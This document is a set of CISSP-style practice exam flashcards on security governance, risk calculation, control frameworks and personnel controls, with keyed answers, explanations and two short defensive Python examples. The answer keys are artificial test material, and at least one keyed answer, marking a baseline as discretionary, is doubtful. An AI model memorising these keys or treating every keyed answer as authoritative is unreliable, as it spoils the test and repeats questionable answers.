Interruptions to service must not exceed 3 seconds. Interruptions beyond this threshold must be logged by the system and provided monthly.
A splash screen must be presented to website users for a duration of 5 to 10 seconds, giving them the choice to opt-out of services.
Security incidents must be resolved within 24 hours.
Interruptions to service must not exceed 3 seconds. Interruptions beyond this threshold must be logged by the system and provided monthly.
SLAs need to have a measurable and financially/legally enforceable metric. While some of these options have numeric metrics, they are not objective or reasonable, and could easily be disputed.
203
Which of the following is not an example of governance? Organizational roles Guidelines Policy Procedures
Guidelines When all of the answers are theoretically “correct”, try to choose the option that is the least correct. In this case, since guidelines are recommendations, they would be the least correct out of the options presented here.
204
How should proposed changes be handled when they comply with policy but do not comply with guidelines? They should be avoided if any risks are discovered. They should be considered for implementation through the regular change process. They should be accepted for risks by management. They should receive additional scrutiny from stakeholders prior to being considered.
They should be considered for implementation through the regular change process. While the options available are vague and poorly worded, look for key words that can help you focus on the bottom line and rule out the bad options. Ultimately this question asks what the difference is between policy and guideline. If you remember that guidelines are simply suggestions, then this question becomes fairly easy. If a change complies with policy then it should be considered through the normal process.
205
In which situation would an employee have the most repudiation? Administrators have local admin access to change, read, update, and delete. Administrator activities are logged and they have full read/write permissions. Administrators have read only access. Administrators have impersonator accounts where logging is written as the impersonated user.
Administrators have impersonator accounts where logging is written as the impersonated user. This question is vague, and has multiple right answers, but the best choice is the one in which the employee would have the “most” repudiation. Remember that repudiation is the ability to deny, so in the case where an “impersonator” account exists, the admin remains completely anonymous and users can deny all actions performed under their accounts.
206
A business that transports and stores your backup media also serves other customers and has concerns with allowing your audit staff on site. If they are subject to your company’s data regulations, what is the most acceptable solution to this dilemma? Seek cooperation to conduct an onsite audit. Elevate the issue to the storage facility upper management. Ensure that the right-to-audit is in the contract. Request copies of third-party audit results.
Request copies of third-party audit results. When all of the options seem good, you have to use the process of elimination to weed out the worst options. When ruling out options, re-read the question multiple times, especially if the question is short. In this case since we don’t know what’s in the contract or what the regulations allow, conducting an audit is out of the question, and looking at the contract won’t do any good other than adding to your knowledge. Elevating the issue might be good, but the CBK specifically mentions reviewing audit results for organizations that are subject to the same regulations. Be sure to review risk management concepts in Domain 1 if you struggled with this question.
207
Which of the following is the best example of a layered defense? Use of digital signatures and private keys Multifactor authentication and a separate passcode Role-based access controls and user monitoring Security guards at the main entrance and proximity access card locks on the remaining doors
Role-based access controls and user monitoring This question requires you to think through each option, what the two items might do in combination, and how they complement each other in a layered defense architecture. In this case, the only pairing that provides sufficient layered defense is RBAC plus monitoring, because it combines a preventive technical control with a detective administrative/management control. The remaining options are good but not the best (remember to always choose the “best” option).
208
Access authorization rules are typically enforced by: Access control systems Organizational standards Access control procedures Role-based access control matrices
Access control systems Standards, procedures, and policy dictate the rules, but systems or processes enforce them.
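The three cards above (the “impersonator account” repudiation question, layered defense, and enforcement of access rules) come together in one small enforcement point. The following is an added example, not code from the flashcard deck or any product: a policy decision point that enforces a role matrix and writes an audit record naming the real authenticated principal even when an administrator acts as another user. All role, user and action names are constructed for illustration.

```python
"""Added example (not from the source deck): RBAC enforcement plus audit
logging that preserves non-repudiation when an admin acts 'as' a user.

The roles, users and objects below are constructed for illustration."""
from dataclasses import dataclass, field
from typing import List, Optional

# Access matrix: role -> permitted (object, action) pairs. Policy defines it;
# the EnforcementPoint below is what actually enforces it.
ROLE_MATRIX = {
    "teller": {("account", "read")},
    "admin": {("account", "read"), ("account", "update"), ("account", "delete")},
}

USER_ROLES = {"alice": "teller", "bob": "admin"}


@dataclass
class AuditRecord:
    actor: str      # authenticated principal who really issued the request
    subject: str    # user the action was performed as (equals actor unless act_as was used)
    obj: str
    action: str
    allowed: bool


@dataclass
class EnforcementPoint:
    log: List[AuditRecord] = field(default_factory=list)

    def authorize(self, actor: str, obj: str, action: str, act_as: Optional[str] = None) -> bool:
        """Return True if the actor's role permits (obj, action); every decision is logged."""
        subject = act_as or actor
        role = USER_ROLES.get(actor)
        allowed = role is not None and (obj, action) in ROLE_MATRIX.get(role, set())
        # Record both identities: this is what lets us attribute an action to bob
        # even though the system state shows it was done 'as' alice.
        self.log.append(AuditRecord(actor, subject, obj, action, allowed))
        return allowed


def naive_view(record: AuditRecord):
    """What a log written 'as the impersonated user' retains: the actor is lost,
    so the subject can deny the action (the repudiation problem in question 205)."""
    return (record.subject, record.action)


def who_did(log: List[AuditRecord], subject: str, action: str) -> List[str]:
    """Non-repudiation query: which real principals performed `action` as `subject`?"""
    return sorted({r.actor for r in log if r.subject == subject and r.action == action and r.allowed})


if __name__ == "__main__":
    pep = EnforcementPoint()
    pep.authorize("alice", "account", "read")                    # teller reads: allowed
    pep.authorize("alice", "account", "delete")                  # teller deletes: denied, still logged
    pep.authorize("bob", "account", "delete", act_as="alice")    # admin deletes as alice
    for rec in pep.log:
        print(rec)
    print("naive log line:", naive_view(pep.log[2]))
    print("who really deleted as alice:", who_did(pep.log, "alice", "delete"))
```

The point of `who_did` versus `naive_view` is the card's answer: if the audit record only carries the impersonated subject, the real actor is anonymous and the subject can deny the action; recording the authenticated principal alongside the effective subject removes that repudiation.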
209
1. Who has the primary responsibility of determining the classification level for information? A. The functional manager B. Senior management C. The owner D. The user
1. C. A company can have one specific data owner or different data owners who have been delegated the responsibility of protecting specific sets of data. One of the responsibilities that goes into protecting this information is properly classifying it.
210
2. If different user groups with different security access levels need to access the same information, which of the following actions should management take? A. Decrease the security level on the information to ensure accessibility and usability of the information. B. Require specific written approval each time an individual needs to access the information. C. Increase the security controls on the information. D. Decrease the classification label on the information.
C. If data is going to be available to a wide range of people, more granular security should be implemented to ensure that only the necessary people access the data and that the operations they carry out are controlled. The security implemented can come in the form of authentication and authorization technologies, encryption, and specific access control mechanisms.
211
3. What should management consider the most when classifying data? A. The type of employees, contractors, and customers who will be accessing the data B. Availability, integrity, and confidentiality C. Assessing the risk level and disabling countermeasures D. The access controls that will be protecting the data
3. B. The best answer to this question is B, because to properly classify data, the data owner must evaluate the availability, integrity, and confidentiality requirements of the data. Once this evaluation is done, it will dictate which employees, contractors, and users can access the data, which is expressed in answer A. This assessment will also help determine the controls that should be put into place.
212
4. Who is ultimately responsible for making sure data is classified and protected? A. Data owners B. Users C. Administrators D. Management
4. D. The key to this question is the use of the word “ultimately.” Though management can delegate tasks to others, it is ultimately responsible for everything that takes place within a company. Therefore, it must continually ensure that data and resources are being properly protected.
213
5. Which factor is the most important item when it comes to ensuring security is successful in an organization? A. Senior management support B. Effective controls and implementation methods C. Updated and relevant security policies and procedures D. Security awareness by all employees
5. A. Without senior management’s support, a security program will not receive the necessary attention, funds, resources, and enforcement capabilities.
214
6. When is it acceptable to not take action on an identified risk? A. Never. Good security addresses and reduces all risks. B. When political issues prevent this type of risk from being addressed C. When the necessary countermeasure is complex. D. When the cost of the countermeasure outweighs the value of the asset and potential loss.
6. D. Companies may decide to live with specific risks they are faced with if the cost of trying to protect themselves would be greater than the potential loss if the threat were to become real. Countermeasures are usually complex to a degree, and there are almost always political issues surrounding different risks, but these are not reasons to not implement a countermeasure.
215
7. Which is the most valuable technique when determining if a specific security control should be implemented? A. Risk analysis B. Cost/benefit analysis C. ALE results D. Identifying the vulnerabilities and threats causing the risk
7. B. Although the other answers may seem correct, B is the best answer here. This is because a risk analysis is performed to identify risks and come up with suggested countermeasures. The ALE tells the company how much it could lose if a specific threat became real. The ALE value will go into the cost/benefit analysis, but the ALE does not address the cost of the countermeasure and the benefit of a countermeasure. All the data captured in answers A, C, and D are inserted into a cost/benefit analysis.
216
8. Which best describes the purpose of the ALE calculation? A. Quantifies the security level of the environment B. Estimates the loss possible for a countermeasure C. Quantifies the cost/benefit result D. Estimates the loss potential of a threat in a span of a year
8. D. The ALE calculation estimates the potential loss that can affect one asset from a specific threat within a one-year time span. This value is used to figure out the amount of money that should be earmarked to protect this asset from this threat.
217
9. The security functionality defines the expected activities of a security mechanism, and assurance defines which of the following? A. The controls the security mechanism will enforce B. The data classification after the security mechanism has been implemented C. The confidence of the security the mechanism is providing D. The cost/benefit relationship
9. C. The functionality describes how a mechanism will work and behave. This may have nothing to do with the actual protection it provides. Assurance is the level of confidence in the protection level a mechanism will provide. When systems and mechanisms are evaluated, their functionality and assurance should be examined and tested individually.
218
10. How do you calculate residual risk? A. Threats × risks × asset value B. (Threats × asset value × vulnerability) × risks C. SLE × frequency = ALE D. (Threats × vulnerability × asset value) × controls gap
10. D. The equation is more conceptual than practical. It is hard to assign a number to an individual vulnerability or threat. This equation enables you to look at the potential loss of a specific asset, as well as the controls gap (what the specific countermeasure cannot protect against). What remains is the residual risk, which is what is left over after a countermeasure is implemented.
219
11. Why should the team that will perform and review the risk analysis information be made up of people in different departments? A. To make sure the process is fair and that no one is left out. B. It shouldn’t. It should be a small group brought in from outside the organization because otherwise the analysis is biased and unusable. C. Because people in different departments understand the risks of their department. Thus, it ensures the data going into the analysis is as close to reality as possible. D. Because the people in the different departments are the ones causing the risks, so they should be the ones held accountable.
11. C. An analysis is only as good as the data that go into it. Data pertaining to risks the company faces should be extracted from the people who understand best the business functions and environment of the company. Each department understands its own threats and resources, and may have possible solutions to specific threats that affect its part of the company.
220
12. Which best describes a quantitative risk analysis? A. A scenario-based analysis to research different security threats B. A method used to apply severity levels to potential loss, probability of loss, and risks C. A method that assigns monetary values to components in the risk assessment D. A method that is based on gut feelings and opinions
12. C. A quantitative risk analysis assigns monetary values and percentages to the different components within the assessment. A qualitative analysis uses opinions of individuals and a rating system to gauge the severity level of different threats and the benefits of specific countermeasures.
221
13. Why is a truly quantitative risk analysis not possible to achieve? A. It is possible, which is why it is used. B. It assigns severity levels. Thus, it is hard to translate into monetary values. C. It is dealing with purely quantitative elements. D. Quantitative measures must be applied to qualitative elements.
13. D. During a risk analysis, the team is trying to properly predict the future and all the risks that future may bring. It is somewhat of a subjective exercise and requires educated guessing. It is very hard to properly predict that a flood will take place once in ten years and cost a company up to $40,000 in damages, but this is what a quantitative analysis tries to accomplish.
222
14. What is CobiT and where does it fit into the development of information security systems and security programs? A. Lists of standards, procedures, and policies for security program development B. Current version of ISO 17799 C. A framework that was developed to deter organizational internal fraud D. Open standards for control objectives
14. D. The Control Objectives for Information and related Technology (CobiT) is a framework developed by the Information Systems Audit and Control Association (ISACA) and the IT Governance Institute (ITGI). It defines goals for the controls that should be used to properly manage IT and ensure IT maps to business needs.
223
15. What are the four domains that make up CobiT? A. Plan and Organize, Acquire and Implement, Deliver and Support, and Monitor and Evaluate B. Plan and Organize, Maintain and Implement, Deliver and Support, and Monitor and Evaluate C. Plan and Organize, Acquire and Implement, Support and Purchase, and Monitor and Evaluate D. Acquire and Implement, Deliver and Support, and Monitor and Evaluate
15. A. CobiT has four domains: Plan and Organize, Acquire and Implement, Deliver and Support, and Monitor and Evaluate. Each category drills down into subcategories. For example, Acquire and Implement contains the following subcategories:
* Acquire and Maintain Application Software
* Acquire and Maintain Technology Infrastructure
* Develop and Maintain Procedures
* Install and Accredit Systems
* Manage Changes
224
16. What is the ISO/IEC 27799 standard? A. A standard on how to protect personal health information B. The new version of BS 17799 C. Definitions for the new ISO 27000 series D. The new version of NIST 800-60
16. A. ISO 27799 is titled “Health informatics: Information security management in health using ISO/IEC 27002.” Its purpose is to provide guidance to health organizations and other holders of personal health information on how to protect such information by implementing the controls of ISO/IEC 27002.
225
17. CobiT was developed from the COSO framework. What are COSO’s main objectives and purpose? A. COSO is a risk management approach that pertains to control objectives and IT business processes. B. Prevention of a corporate environment that allows for and promotes financial fraud C. COSO addresses corporate culture and policy development. D. COSO is a risk management system used for the protection of federal systems.
17. B. COSO deals more at the strategic level, while CobiT focuses more at the operational level. CobiT is a way to meet many of the COSO objectives, but only from the IT perspective. COSO deals with non-IT items also, as in company culture, financial accounting principles, board of director responsibility, and internal communication structures. Its main purpose is to help ensure fraudulent financial reporting cannot take place in an organization.
226
18. OCTAVE, NIST 800-30, and AS/NZS 4360 are different approaches to carrying out risk management within companies and organizations. What are the differences between these methods? A. NIST 800-30 and OCTAVE are corporate based, while AS/NZS is international. B. NIST 800-30 is IT based, while OCTAVE and AS/NZS 4360 are corporate based. C. AS/NZS is IT based, and OCTAVE and NIST 800-30 are assurance based. D. NIST 800-30 and AS/NZS are corporate based, while OCTAVE is international
18. B. NIST 800-30 Risk Management Guide for Information Technology Systems is a U.S. federal standard that is focused on IT risks. OCTAVE is a methodology to set up a risk management program within an organizational structure. AS/NZS 4360 takes a much broader approach to risk management. This methodology can be used to understand a company’s financial, capital, human safety, and business decisions risks. Although it can be used to analyze security risks, it was not created specifically for this purpose.
227
A server that houses sensitive data has been stored in an unlocked room for the last few years at Company A. The door to the room has a sign on the door that reads “Room 1.” This sign was placed on the door with the hope that people would not look for important servers in this room. Realizing this is not optimum security, the company has decided to install a reinforced lock and server cage for the server and remove the sign. They have also hardened the server’s configuration and employed strict operating system access controls. 19. The fact that the server has been in an unlocked room marked “Room 1” for the last few years means the company was practicing which of the following? A. Logical security B. Risk management C. Risk transference D. Security through obscurity
19. D. Security through obscurity is not implementing true security controls, but rather attempting to hide the fact that an asset is vulnerable in the hope that an attacker will not notice. Security through obscurity is an approach to try and fool a potential attacker, which is a poor way of practicing security. Vulnerabilities should be identified and fixed, not hidden.
228
A server that houses sensitive data has been stored in an unlocked room for the last few years at Company A. The door to the room has a sign on the door that reads “Room 1.” This sign was placed on the door with the hope that people would not look for important servers in this room. Realizing this is not optimum security, the company has decided to install a reinforced lock and server cage for the server and remove the sign. They have also hardened the server’s configuration and employed strict operating system access controls. 20. The new reinforced lock and cage serve as which of the following? A. Logical controls B. Physical controls C. Administrative controls D. Compensating controls
20. B. Physical controls are security mechanisms in the physical world, as in locks, fences, doors, computer cages, etc. There are three main control types, which are administrative, technical, and physical.
229
A server that houses sensitive data has been stored in an unlocked room for the last few years at Company A. The door to the room has a sign on the door that reads “Room 1.” This sign was placed on the door with the hope that people would not look for important servers in this room. Realizing this is not optimum security, the company has decided to install a reinforced lock and server cage for the server and remove the sign. They have also hardened the server’s configuration and employed strict operating system access controls 21. The operating system access controls comprise which of the following? A. Logical controls B. Physical controls C. Administrative controls D. Compensating controls
21. A. Logical (or technical) controls are security mechanisms, as in firewalls, encryption, software permissions, and authentication devices. They are commonly used in tandem with physical and administrative controls to provide a defense-in-depth approach to security.
230
A company has an e-commerce website that carries out 60 percent of its annual revenue. Under the current circumstances, the annualized loss expectancy for a website against the threat of attack is $92,000. After implementing a new application-layer firewall, the new annualized loss expectancy would be $30,000. The firewall costs $65,000 per year to implement and maintain. 22. How much does the firewall save the company in loss expenses? A. $62,000 B. $3,000 C. $65,000 D. $30,000
22. A. $62,000 is the correct answer. The firewall reduced the annualized loss expectancy (ALE) from $92,000 to $30,000 for a savings of $62,000. The formula for ALE is single loss expectancy × annualized rate of occurrence = ALE. Subtracting the ALE value after the firewall is implemented from the value before it was implemented results in the potential loss savings this type of control provides.
231
A company has an e-commerce website that carries out 60 percent of its annual revenue. Under the current circumstances, the annualized loss expectancy for a website against the threat of attack is $92,000. After implementing a new application-layer firewall, the new annualized loss expectancy would be $30,000. The firewall costs $65,000 per year to implement and maintain. 23. What is the value of the firewall to the company? A. $62,000 B. $3,000 C. –$62,000 D. –$3,000
23. D. –$3,000 is the correct answer. The firewall saves $62,000, but costs $65,000 per year. 62,000 – 65,000 = –3,000. The firewall actually costs the company more than the original expected loss, and thus the value to the company is a negative number. The formula for this calculation is (ALE before the control is implemented) – (ALE after the control is implemented) – (annual cost of control) = value of control.
232
A company has an e-commerce website that carries out 60 percent of its annual revenue. Under the current circumstances, the annualized loss expectancy for a website against the threat of attack is $92,000. After implementing a new application-layer firewall, the new annualized loss expectancy would be $30,000. The firewall costs $65,000 per year to implement and maintain. 24. Which of the following describes the company’s approach to risk management? A. Risk transference B. Risk avoidance C. Risk acceptance D. Risk mitigation
24. D. Risk mitigation involves employing controls in an attempt to reduce either the likelihood or the damage associated with an incident, or both. The four ways of dealing with risk are accept, avoid, transfer, and mitigate (reduce). A firewall is a countermeasure installed to reduce the risk of a threat.
233
A small remote office for a company is valued at $800,000. It is estimated, based on historical data, that a fire is likely to occur once every ten years at a facility in this area. It is estimated that such a fire would destroy 60 percent of the facility under the current circumstances and with the current detective and preventative controls in place. 25. What is the Single Loss Expectancy (SLE) for the facility suffering from a fire? A. $80,000 B. $480,000 C. $320,000 D. 60%
25. B. $480,000 is the correct answer. The formula for single loss expectancy (SLE) is asset value × exposure factor (EF) = SLE. In this situation the formula would work out as asset value ($800,000) × exposure factor (60%) = $480,000. This means that the company has a potential loss value of $480,000 pertaining to this one asset (facility) and this one threat type (fire).
234
A small remote office for a company is valued at $800,000. It is estimated, based on historical data, that a fire is likely to occur once every ten years at a facility in this area. It is estimated that such a fire would destroy 60 percent of the facility under the current circumstances and with the current detective and preventative controls in place. 26. What is the Annualized Rate of Occurrence (ARO)? A. 1 B. 10 C. .1 D. .01
26. C. The annualized rate of occurrence (ARO) is the frequency with which a threat is expected to occur within a 12-month period. A fire expected once every ten years gives an ARO of 1/10 = 0.1. It is a value used in the ALE formula, which is SLE × ARO = ALE.
235
A small remote office for a company is valued at $800,000. It is estimated, based on historical data, that a fire is likely to occur once every ten years at a facility in this area. It is estimated that such a fire would destroy 60 percent of the facility under the current circumstances and with the current detective and preventative controls in place. 27. What is the Annualized Loss Expectancy (ALE)? A. $480,000 B. $32,000 C. $48,000 D. .6
27. C. $48,000 is the correct answer. The annualized loss expectancy formula (SLE × ARO = ALE) is used to calculate the loss potential for one asset experiencing one threat in a 12-month period; here $480,000 × 0.1 = $48,000. The resulting ALE value helps to determine the amount that can reasonably be spent on the protection of that asset. In this situation, the company should not spend over $48,000 per year on protecting this asset from the threat of fire. ALE values help organizations rank the severity level of the risks they face so they know which ones to deal with first and how much to spend on each.
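Questions 22 through 27 all exercise the same three formulas (SLE = asset value × EF, ALE = SLE × ARO, control value = ALE before − ALE after − annual cost). The following is an added example, not material from the flashcard deck: the formulas as reusable functions, applied to a constructed risk register so the ALE ranking and the buy/don't-buy decision for a control are both visible. The “office fire” and firewall figures are the ones from the cards; the other register entries are made up for illustration.

```python
"""Added example (not from the source deck): quantitative risk formulas
from questions 22-27 applied to a small constructed risk register."""
from typing import List, Tuple


def sle(asset_value: float, exposure_factor: float) -> float:
    """Single Loss Expectancy = asset value x exposure factor (0.0 .. 1.0)."""
    if not 0.0 <= exposure_factor <= 1.0:
        raise ValueError("exposure factor must be a fraction between 0 and 1")
    return asset_value * exposure_factor


def aro(events: float, years: float) -> float:
    """Annualized Rate of Occurrence: expected events per year (once in 10 years -> 0.1)."""
    return events / years


def ale(single_loss: float, annual_rate: float) -> float:
    """Annualized Loss Expectancy = SLE x ARO."""
    return single_loss * annual_rate


def control_value(ale_before: float, ale_after: float, annual_cost: float) -> float:
    """Value of a control = (ALE before) - (ALE after) - (annual cost of the control).
    A negative result means the control costs more than the loss it prevents."""
    return ale_before - ale_after - annual_cost


# Each row: (threat, asset value, exposure factor, events, years over which they occur)
Register = List[Tuple[str, float, float, float, float]]


def rank_risks(register: Register) -> List[Tuple[str, float]]:
    """Score every row by ALE and order highest first, which is how ALE is
    used to decide what to address first and how much to spend on each."""
    scored = [(name, ale(sle(value, ef), aro(events, years)))
              for name, value, ef, events, years in register]
    return sorted(scored, key=lambda row: row[1], reverse=True)


# Constructed register. "office fire" uses the numbers from questions 25-27;
# the other two rows are invented for illustration.
REGISTER: Register = [
    ("office fire", 800_000, 0.60, 1, 10),
    ("laptop theft", 3_000, 1.00, 4, 1),
    ("ransomware on file server", 250_000, 0.40, 1, 5),
]

if __name__ == "__main__":
    for name, value in rank_risks(REGISTER):
        print(f"{name:28s} ALE ${value:,.0f}")
    # Questions 22/23: firewall drops ALE from 92,000 to 30,000 at 65,000 per year.
    print("firewall saves:", 92_000 - 30_000)
    print("firewall value:", control_value(92_000, 30_000, 65_000))
```

Running it reproduces the card answers (savings of $62,000 but a value of −$3,000, so the firewall is not worth buying at that price) and shows why ranking by ALE matters: the fire dominates the register even though it is the least frequent threat.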
236
28. The international standards bodies ISO and IEC developed a series of standards that are used in organizations around the world to implement and maintain information security management systems. The standards were derived from the British Standard 7799, which was broken down into two main pieces. Organizations can use this series of standards as guidelines, but can also be certified against them by accredited third parties. Which of the following are incorrect mappings pertaining to the individual standards that make up the ISO/IEC 27000 series? i. ISO/IEC 27001 outlines ISMS implementation guidelines, and ISO/IEC 27003 outlines the ISMS program’s requirements. ii. ISO/IEC 27005 outlines the audit and certification guidance, and ISO/IEC 27002 outlines the metrics framework. iii. ISO/IEC 27006 outlines the program implementation guidelines, and ISO/IEC 27005 outlines risk management guidelines. iv. ISO/IEC 27001 outlines the code of practice, and ISO/IEC 27004 outlines the implementation framework. A. i, iii B. i, ii C. ii, iii, iv D. i, ii, iii, iv
28. D. The proper mappings for the ISO/IEC standards are as follows:
* ISO/IEC 27001 ISMS requirements
* ISO/IEC 27002 Code of practice for information security management
* ISO/IEC 27003 Guideline for ISMS implementation
* ISO/IEC 27004 Guideline for information security management measurement and metrics framework
* ISO/IEC 27005 Guideline for information security risk management
* ISO/IEC 27006 Guidance for bodies providing audit and certification of information security management systems
237
29. The information security industry is made up of various best practices, standards, models, and frameworks. Some were not developed first with security in mind, but can be integrated into an organizational security program to help in its effectiveness and efficiency. It is important to know of all of these different approaches so that an organization can choose the ones that best fit its business needs and culture. Which of the following best describes the approach(es) that should be put into place if an organization wants to integrate a way to improve its security processes over a period of time? i. Information Technology Infrastructure Library should be integrated because it allows for the mapping of IT service process management, business drivers, and security improvement. ii. Six Sigma should be integrated because it allows for the defects of security processes to be identified and improved upon. iii. Capability Maturity Model should be integrated because it provides distinct maturity levels. iv. The Open Group Architecture Framework should be integrated because it provides a structure for process improvement. A. i, iii B. ii, iii, iv C. ii, iii D. ii, iv
29. C. The best process improvement approaches provided in this list are Six Sigma and the Capability Maturity Model. The following outlines the definitions for all items in this question:
* TOGAF Model and methodology for the development of enterprise architectures developed by The Open Group
* ITIL Processes to allow for IT service management developed by the United Kingdom’s Office of Government Commerce
* Six Sigma Business management strategy that can be used to carry out process improvement
* Capability Maturity Model Integration (CMMI) Organizational development for process improvement developed by Carnegie Mellon
238
Todd is a new security manager and has the responsibility of implementing personnel security controls within the financial institution where he works. Todd knows that many employees do not fully understand how their actions can put the institution at risk; thus, an awareness program needs to be developed. He has determined that the bank tellers need to get a supervisory override when customers have checks over $3,500 that need to be cashed. He has also uncovered that some employees have stayed in their specific positions within the company for over three years. Todd would like to be able to investigate some of the bank’s personnel activities to see if any fraudulent activities have taken place. Todd is already ensuring that two people must use separate keys at the same time to open the bank vault. 30. Todd documents several fraud opportunities that the employees have at the financial institution so that management understands these risks and allocates the funds and resources for his suggested solutions. Which of the following best describes the control Todd should put into place to be able to carry out fraudulent investigation activity? A. Separation of duties B. Rotation of duties C. Mandatory vacations D. Split knowledge
30. C. Mandatory vacation is an administrative detective control that allows an organization to investigate an employee’s daily business activities to uncover any potential fraud that may be taking place. The employee should be required to be away from the organization for a two-week period while another person is put into that role. The idea is that the person who was rotated into that position may be able to detect suspicious activities.
239
31. If the financial institution wants to force collusion to take place for fraud to happen successfully in this situation, what should Todd put into place? A. Separation of duties B. Rotation of duties C. Social engineering D. Split knowledge
31. A. Separation of duties is an administrative control that is put into place to ensure that one person cannot carry out a critical task by himself. If a person were able to carry out a critical task alone, this could put the organization at risk. Collusion is when two or more people come together to carry out fraud. So if a task was split between two people, they would have to carry out collusion (working together) to complete that one task and carry out fraud.
240
32. Todd wants to be able to prevent fraud from taking place, but he knows that some people may get around the types of controls he puts into place. In those situations he wants to be able to identify when an employee is doing something suspicious. Which of the following incorrectly describes what Todd is implementing in this scenario and what those specific controls provide? A. Separation of duties by ensuring that a supervisor must approve the cashing of a check over $3,500. This is an administrative control that provides preventative protection for Todd’s organization. B. Rotation of duties by ensuring that one employee only stays in one position for up to three months of a time. This is an administrative control that provides detective capabilities. C. Security awareness training, which is a preventive administrative control that can also emphasize enforcement. D. Dual control, which is an administrative detective control that can ensure that two employees must carry out a task simultaneously.
32. D. Dual control is an administrative preventative control. It ensures that two people must carry out a task at the same time, as in two people having separate keys when opening the vault. It is not a detective control. Notice that the question asks what Todd is not doing. Remember that on the exam you need to choose the best answer.
241
Sam has just been hired as the new security officer for a pharmaceutical company. The company has experienced many data breaches and has charged Sam with ensuring that the company is better protected. The company currently has the following classifications in place: public, confidential, and secret. There is a data classification policy that outlines the classification scheme and the definitions for each classification, but there is no supporting documentation that the technical staff can follow to know how to meet these goals. The company has no data loss prevention controls in place and only conducts basic security awareness training once a year. Talking to the business unit managers, he finds out that only half of them even know where the company’s policies are located and none of them know their responsibilities pertaining to classifying data. 33. Which of the following best describes what Sam should address first in this situation? A. Integrate data protection roles and responsibilities within the security awareness training and require everyone to attend it within the next 15 days. B. Review the current classification policies to ensure that they properly address the company’s risks. C. Meet with senior management and get permission to enforce data owner tasks for each business unit manager. D. Audit all of the current data protection controls in place to get a firm understanding of what vulnerabilities reside in the environment.
33. B. While each answer is a good thing for Sam to carry out, the first thing that needs to be done is to ensure that the policies properly address data classification and protection requirements for the company. Policies provide direction, and all other documents (standards, procedures, guidelines) and security controls are derived from the policies and support them.
242
Sam has just been hired as the new security officer for a pharmaceutical company. The company has experienced many data breaches and has charged Sam with ensuring that the company is better protected. The company currently has the following classifications in place: public, confidential, and secret. There is a data classification policy that outlines the classification scheme and the definitions for each classification, but there is no supporting documentation that the technical staff can follow to know how to meet these goals. The company has no data loss prevention controls in place and only conducts basic security awareness training once a year. Talking to the business unit managers, he finds out that only half of them even know where the company’s policies are located and none of them know their responsibilities pertaining to classifying data. 34. Sam needs to get senior management to assign the responsibility of protecting specific data sets to the individual business unit managers, thus making them data owners. Which of the following would be the most important in the criteria the managers would follow in the process of actually classifying data once this responsibility has been assigned to them? A. Usefulness of the data B. Age of the data C. Value of the data D. Compliance requirements of the data
34. C. Data is one of the most critical assets to any organization. The value of the asset must be understood so that the organization knows which assets require the most protection. There are many components that go into calculating the value of an asset: cost of replacement, revenue generated from asset, amount adversaries would pay for the asset, cost that went into the development of the asset, productivity costs if asset was absent or destroyed, and liability costs of not properly protecting the asset. So the data owners need to be able to determine the value of the data to the organization for proper classification purposes.
243
Sam has just been hired as the new security officer for a pharmaceutical company. The company has experienced many data breaches and has charged Sam with ensuring that the company is better protected. The company currently has the following classifications in place: public, confidential, and secret. There is a data classification policy that outlines the classification scheme and the definitions for each classification, but there is no supporting documentation that the technical staff can follow to know how to meet these goals. The company has no data loss prevention controls in place and only conducts basic security awareness training once a year. Talking to the business unit managers, he finds out that only half of them even know where the company’s policies are located and none of them know their responsibilities pertaining to classifying data. 35. From this scenario, what has the company accomplished so far? A. Implementation of administrative controls B. Implementation of operational controls C. Implementation of physical controls D. Implementation of logical controls
35. A. The company has developed a data classification policy, which is an administrative control.
244
Susan has been told by her boss that she will be replacing the current security manager within her company. Her boss explained to her that operational security measures have not been carried out in a standard fashion, so some systems have proper security configurations and some do not. Her boss needs to understand how dangerous it is to have some of the systems misconfigured along with what to do in this situation. 36. Which of the following best describes what Susan needs to ensure the operations staff creates for proper configuration standardization? A. Dual control B. Redundancy C. Training D. Baselines
36. D. The operations staff needs to know what minimum level of security is required per system within the network. This minimum level of security is referred to as a baseline. Once a baseline is set per system, then the staff has something to compare the system against to know if changes have not taken place properly, which could make the system vulnerable.
245
Susan has been told by her boss that she will be replacing the current security manager within her company. Her boss explained to her that operational security measures have not been carried out in a standard fashion, so some systems have proper security configurations and some do not. Her boss needs to understand how dangerous it is to have some of the systems misconfigured along with what to do in this situation. 37. Which of the following is the best way to illustrate to her boss the dangers of the current configuration issues? A. Map the configurations to the compliancy requirements. B. Compromise a system to illustrate its vulnerability. C. Audit the systems. D. Carry out a risk assessment.
37. D. Susan needs to illustrate these vulnerabilities (misconfigured systems) in the context of risk to her boss. This means she needs to identify the specific vulnerabilities, associate threats to those vulnerabilities, and calculate their risks. This will allow her boss to understand how critical these issues are and what type of action needs to take place.
246
Susan has been told by her boss that she will be replacing the current security manager within her company. Her boss explained to her that operational security measures have not been carried out in a standard fashion, so some systems have proper security configurations and some do not. Her boss needs to understand how dangerous it is to have some of the systems misconfigured along with what to do in this situation. 38. Which of the following is one of the most likely solutions that Susan will come up with and present to her boss? A. Development of standards B. Development of training C. Development of monitoring D. Development of testing
38. A. Standards need to be developed that outline proper configuration management processes and approved baseline configuration settings. Once these standards are developed and put into place, then employees can be trained on these issues and how to implement and maintain what is outlined in the standards. Systems can be tested against what is laid out in the standards, and systems can be monitored to detect if there are configurations that do not meet the requirements outlined in the standards. You will find that some CISSP questions seem subjective and their answers hard to pin down. Questions that ask what is “best” or “more likely” are common.
247
Policy: “Protect the CIA of PII by hardening the operating system” is considered
Mandatory
Discretionary
Mandatory
248
Procedure: “Step 1: Install prehardened OS image. Step 2: Download patches from update server. Step 3: …” is considered
Mandatory
Discretionary
Mandatory
249
Standard: “Use Nexus-6 laptop hardware” is considered
Mandatory
Discretionary
Mandatory
250
Guideline: “Patch installation may be automated via the use of an installer script” is considered
Mandatory
Discretionary
Discretionary
251
Baseline: “Use the CIS Security Benchmarks for Windows” is considered
Mandatory
Discretionary
Discretionary
252
Your company sells Apple iPods online and has suffered many denial-of-service (DoS) attacks. Your company makes an average $20,000 profit per week, and a typical DoS attack lowers sales by 40%. You suffer seven DoS attacks on average per year. A DoS-mitigation service is available for a subscription fee of $10,000 per month. You have tested this service and believe it will mitigate the attacks. 1. What is the ARO in the above scenario? (a) $20,000 (b) 40% (c) 7 (d) $10,000
1. Correct answer and explanation: C. The ARO is the number of attacks in a year. Incorrect answers and explanations: Answers A, B, and D are incorrect. The AV is $20,000. The EF is 40% and the monthly cost of the DoS service (used to calculate TCO) is $10,000.
253
